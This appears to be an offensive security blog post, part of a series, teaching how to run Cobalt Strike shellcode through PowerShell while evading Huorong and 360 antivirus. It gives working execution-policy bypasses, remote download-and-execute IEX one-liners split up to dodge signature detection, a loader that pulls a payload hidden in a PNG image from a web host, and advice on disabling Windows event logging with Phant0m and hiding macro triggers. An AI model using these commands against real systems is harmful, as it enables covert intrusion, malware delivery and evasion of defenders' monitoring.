0%

#2-Methods to execute shellcode bypassing Huorong and 360 antivirus software(To be continued)

Using PowerShell script to load shellcode

Pre-knowledge

PowerShell is a task automation and configuration management framework from Microsoft, consisting of a command-line shell and associated scripting language. Initially a Windows component only, known as Windows PowerShell, it was made open-source and cross-platform on 18 August 2016 with the introduction of PowerShell Core. The former is built on the .NET Framework, the latter on .NET Core.

Third-party developers can add cmdlets and providers to PowerShell. Cmdlets may be used by scripts and scripts may be packaged into modules.

This is the concept of PowerShell from Wikipedia. All in all, which we should know is the PowerShell can help us to use many powerful features, like executing ps1 script file in the memory directly with out writing files to the hard disk. What’s more , we can also use the features which .NET Framework provided.

there are already have many powerful Post-Exploitation Framework build with PowerShell, like PowerSploit , PowerCat , Empire and so on. But what we are going to discuss today is loading our shellcode via PowerShell.

Starting

We can use PowerShell script to achieve our goal. But before we executing the script, we should check the PowerShell execution policy of your target.

There are six different execution policies in PowerShell.

  • Unrestricted

    Execute any script without restrictions

  • Restricted

    The default policy , does not allow the execution of any script

  • AllSigned

    All scripts must be signed to run

  • RemoteSigned

    Local scripts are unlimited, but scripts from the network must be signed

  • Bypass

    no restrictions and alerts

  • Undefined

    Undefined execution policy

We can use this command to check the execution policy of your target.(you can use PowerShell command)

1
powershell Get-ExecutionPolicy
image-20200428152459763

This is the execution policy of my laptop, and this is also the default PowerShell execution policy.

Let’s try to execute a PowerShell script file and see what happens.

image-20200428153559331

As we mentioned before, the default policy denied us to execute the external ps1 script file.

Bypass the PowerShell execution policy

Luckily, we can use serval ways to bypass PowerShell execution policy. At first, let’s check out the meaning of some characters and commands.

Here are some useful characters and commands which can help us to execute our PowerShell script file.

Characters meaning
| take the output of one command as the input of another command
; execute system commands continuously
call operator, execute commands, scripts or functions
Commands meaning
Get-Host get the version of PowerShell
Get-Content get the content of file
Set-Content test.txt-Value “your Value” set the content of file
Get-Process get the current process list
Get-Location get the current physical path

Modify the execution policy temporary

set the execution policy to “bypass” or “unrestricted”.

1
powershell -ExecutionPolicy Bypass -File "C:\Users\L1ng Feng\Desktop\1.ps1"

you can also use the concise command like this.

1
powershell -ep Bypass "C:\Users\L1ng Feng\Desktop\1.ps1"

Using this method, you can also call the functions in your ps1 script.

1
powershell -ExecutionPolicy Bypass "import-module 'C:\Users\L1ng Feng\Desktop\1.ps1';Get-ChinaTimeAlias"

Executing Successfully.

image-20200428155850445

Using “Get-Content” and “|”

1
Get-Content 1.ps1 | powershell -NoProfile -
image-20200428195046748

Invoke-Expression means that use string as a command so you can also use …

1
powershell Get-Content "C:\Users\L1ng Feng\Desktop\1.ps1" | Invoke-Expression

also have the concise command (gc is the abbreviation of Get-Content and iex is the the abbreviation of Invoke-Expression)

1
gc "C:\Users\L1ng Feng\Desktop\1.ps1" | iex

image-20200428200147437

we can also use “type” to replace “Get-Content”.

image-20200428202531021

However, this method has disadvantages because the script content is saved to the local disk, so it may be detected by antivirus software when executing certain scripts.

Using “Net.WebClient” to download the remote script file and run it via IEX

This is the content of http://192.168.1.12/

image-20200428203615955

then run this command.

1
powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.12/')"

image-20200428203655061

“-c” is “-command” and use New-Object to create a Net.WebClient.

However, when we actually execute these commands, it may be intercepted by 360 antivirus software like this.

image-20200428204550162

How to deal with this situation?

Bypass anti-virus software

The token like “encoded” “IEX” “DownloadString” “http” “Hidden” etc. will be detected by anti-virus software and prevent us from executing commands.

We know antivirus software detects these specific tokens. So we can use methods like string concatenation to bypass the detection anti-virus software.

let’s run these commands via cmd.

1
powershell -c "$s1='IE';$s2='X(New-Object Net.WebClient).Downlo';$s3='adString(''http://192.168.1.12/'')';IEX ($s1+$s2+$s3)"

We can also use replace for string concatenation.

1
powershell -c "$s1='IEX(New-Object Net.WebClient).Downlo';$s2='wtf(''http://192.168.1.12/'')'.Replace('wtf','adString');IEX ($s1+$s2)"

image-20200428214554983

Bypass Successfully

Shellcode Time ; )

In Cobalt Strike , we have two ways to generate PowerShell payload

PowerShell command

1
powershell -nop -w hidden -encodedcommand xxxxx...

but as we mentioned before, some tokens are detected by the anti-virous software.

what’s more, transferring base64 encoded shellcode is also not that smart.

PowerShell Script File

as for me , I’d like to use this method to load shellcode. (Why, please read on : )

Go to Attacks - Packages - Payload Generator

image-20200428223928303

Choose your Listener and set the Output as PowerShell.

After clicked the Generate button, you’ll get a PowerShell Script File.

Then host this file to website and run processed command via cmd of your target.

1
powershell -c "$s1='IE';$s2='X(New-Object Net.WebClient).Downlo';$s3='adString(''http://192.168.1.15/1.txt'')';IEX ($s1+$s2+$s3)"

Here we go : )

result1

PS. to bypass other anti-virous software , we can do some obfuscation using Invoke-Obfuscation or hide our script file to png file .

Hide your PowerShell Script File

For example, let’s try to hide our PowerShell payload to a png file using Invoke-PSImage.

Generate png payload
1
Invoke-PSImage -Script .\1.ps1 -Image .\1.jpg -Out .\payload.png -Web

1.ps1 is your PowerShell payload File, 1.jpg is your image file.

Run on your targets
1
sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://localhost/payload.png"));$o=a Byte[] 3840;(0..1)|%{foreach($x in(0..1919)){$p=$g.GetPixel($x,$_);$o[$_*1920+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3598]))

Let’s see the execute result.(also executing while 360 and huorong running background)

result2

At last of this section , I’ll give you some tips while using PowerShell

  • If you have PowerShell v2 on the target system use it, because there is no perfect logging capability in PowerShell v2. So you leave less traces.
  • If you have high privileges or you can escalte privileges firstly use Phant0m. If Phant0m runs successfully, Windows Event Log Service will not work. So the target system will not be able to collect logs and will not be able to send logs because it can not collect logs. At the same time the Windows Event Log Service will appear to be running because the svchost.exe process for the Windows Event Log Service has not been stopped but only the related threads have been stopped. This is the main advantage and purpose of Phant0m’s. The service stops, but everything seems to be working.
  • Use definitely obfuscation if you use public scripts or techniques on target system.
  • Develop your own methods against behavioral detections. For example, if you call PowerShell through a PowerPoint file using Macro, use other functions instead of the AutoOpen function in the VBScript language. As everyone triggers the payload using the that function, it will be directly flagged as malicious by the security solutions. For example, you can trigger your payload when the slide switch the full screen mode. Thus, you can bypass many security solutions.